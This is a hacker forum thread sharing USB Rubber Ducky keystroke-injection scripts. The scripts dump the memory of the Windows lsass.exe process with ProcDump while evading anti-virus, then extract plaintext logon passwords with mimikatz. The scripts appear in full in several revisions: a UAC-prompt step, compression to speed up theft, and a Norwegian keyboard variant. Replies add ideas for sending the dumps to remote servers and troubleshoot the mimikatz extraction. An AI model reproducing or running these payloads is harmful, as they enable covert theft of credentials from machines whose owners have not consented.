Jump to content

[Payload] Memory Dump Windows (recover password) without setting off AV


Recommended Posts

Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/

This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe.

While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus.

Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the large'ish filesize of the .dmp (42 MB on my system) would it be possible to save it locally then "grep" the important (smaller?) bits out before transferring them over.

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp 
ENTER

REM *** GTFO ***
STRING exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
REM directory including the version of mimikatz for your targets architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Link to comment
Share on other sites

I took a stab at it and the following is what I came up with:

The ducky starts an admin cmd prompt launches a powershell command that has been base64 encoded so it bypasses execution policy, and will dump the lsass process into c:\windows\temp\lsass.dmp. Once that is done it exits that shell (if the shell stays open nothing else can touch that file) and starts a new lower priv shell just to read the file and dump it to a listening server also all through powershell.

The code is at https://github.com/b00stfr3ak/ducky_lsass_dump

I plan on combining the scripts I have written into a better menu selection because they use a lot of the same code, but that will come in a week or two.

Link to comment
Share on other sites

I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py

Link to comment
Share on other sites

I wrote the same thing but instead uploads to ftp server quietly in the background. You may want to make a rule for windows firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the ducky in long enough to write the files and start the process. After uploading it literally deletes itself.

https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/

Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to backup the dump file remotely once it's created.

Also, you can send commands to mimikatz, might look like this (change dmp file name if needed):

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

Edited by waddell
Link to comment
Share on other sites

To help speed up the transfer speed, you could use a normal flash drive instead of a twin duck. The script will look for any drive labeled "DUCKY", so simply label your normal flash drive to "DUCKY" and either don't use the twin duck firmware or don't label the mass storage drive of the twin duck something else. Then when you run the payload, just make sure your normal flash drive is plugged in first and the drivers for it are loaded. Then you are good to go!

Link to comment
Share on other sites

I can't get mimikatz to read the passwords from the dmp file I created from my second computer. It keeps showing the password for the computer I'm on. Here's the steps I did:

mimikatz.exe

sekurlsa::minidump lsass.dmp

privilege::debug

sekurlsa::logonPasswords full

Any help would be great. Thanks

Edit: I found the problem. I'm suppose to use the x64 version under the Alpha directory and not under the root directory. Plus it's in English which helps a lot.

Edited by parkour86
Link to comment
Share on other sites

Anyone know how the lsass.exe file works? I was able to get mine and one of my friends passwords using the payload on a server we all use but was unable to get my other friends. Does the lsass some how erase the password cache after some time? Using powershell I was able to tell that the lsass.exe has been running since the beginning of August which is when the server was last rebooted. Thanks.

Link to comment
Share on other sites

My duck encoder 2.6 wont encode the "|" sybbol correctly, im in the uk but ive also tried the us language as well but when the duck is entering the symbol its displays empty in uk and as a "^" in us and help would be great

thats very odd, as it works fine for me. As I'm temporarily residing in the UK at the moment. Run this through the encoder, it will help be debug your problem.

DELAY 2000
STRING qwertyuiopasdfghjklzxcvbnm
DELAY 500
ENTER
STRING QWERTYUIOPASDFGHJKZXCVBNM
DELAY 500
ENTER
STRING 1234567890-=
DELAY 500
ENTER
STRING !"£$%^&*()_+
DELAY 500
ENTER
STRING `[];'#,./
DELAY 500
ENTER 
STRING ~{}:@~|<>? \ |
DELAY 500
ENTER 
STRING €
ENTER
Link to comment
Share on other sites

thats very odd, as it works fine for me. As I'm temporarily residing in the UK at the moment. Run this through the encoder, it will help be debug your problem.

DELAY 2000
STRING qwertyuiopasdfghjklzxcvbnm
DELAY 500
ENTER
STRING QWERTYUIOPASDFGHJKZXCVBNM
DELAY 500
ENTER
STRING 1234567890-=
DELAY 500
ENTER
STRING !"£$%^&*()_+
DELAY 500
ENTER
STRING `[];'#,./
DELAY 500
ENTER 
STRING ~{}:@~|<>? \ |
DELAY 500
ENTER 
STRING €
ENTER

I am also in the UK and just ran that using duck encoder 2.6 with -l uk

qwertyuiopasdfghjklzxcvbnm
QWERTYUIOPASDFGHJKZXCVBNM
1234567890-=
!"$%^&*()_+
`[];,./
~{}:@~<>?  
€

it appears that several symbols don't show up

Edited by tom564
Link to comment
Share on other sites

aah, when you use -l uk, your using the built in language map that may be slightly older.

Update the SVN repository and try:

java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin

I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance.

Otherwise the new gb.properties file can be downloaded from here: gb.properties

Edited by midnitesnake
Link to comment
Share on other sites

aah, when you use -l uk, your using the built in language map that may be slightly older.

Update the SVN repository and try:

java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin

I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance.

Otherwise the new gb.properties file can be downloaded from here: gb.properties

Thanks, it now works fine for me.

Link to comment
Share on other sites

Some helpful comments from YouTube regarding this script:

put 7-zip (7za.exe) on duck, execute it (not will be picked up by antivirus for sure) and than copy compressed file to duck i expect thous dump to compress pretty well ;-)

using 7zip max compression gets the size down to 10MB so it will reduce the time by 1/3.
Link to comment
Share on other sites

This seems to working the best for me. I've got it down to about 1:10 on my computer. 7z format works the best as far as speed and size. Not really sure what else can be done. Any ideas?

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
REM directory including the version of mimikatz for your targets architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>
Edited by DyFukA
Link to comment
Share on other sites

I had problems with norwegian keybords and this key ^ so I did som changes in the code to make it work in norwegian.

First i tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, did not work for me.

Instead of using no.properties I use US standard and make computer change from norwegian to us english.

Have tested this on my Norwegian Windows 7 x64, worked perfect for me :)

Probably the way to go insted of dk.properties an se.properties to?

Check out my modified code:

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Modified to circumvent norwegian keyboards by Hackman1970
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
REM *** Input Lanugage Swap to circumvent problmes with norwegian
REM *** Norwegian Windows 7 use to have US english as second language installed by default
REM *** Using shortcut ALT-SHIFT to troggle between NO and US
ALT-SHIFT
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500

REM *** For norwegian I tried to change y[es] to j[a]
REM ALT y
REM ALT j 
REM *** The abowe did not work but LEFTARROW ENTER works :)
LEFTARROW
ENTER
DELAY 500

REM *** Swap Input Lanugage again for cmd.exe shell
ALT-SHIFT 
DELAY 200

REM *** Define DUCKY drive as %duck%
ENTER
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER

REM *** Swap Input Lanugage again hopefully back to norwegian
ALT-SHIFT 


REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
REM directory including the version of mimikatz for your targets architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

Is this the way to go or have anyone fix for no.properties? :rolleyes:

Edited by Hackman1970
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...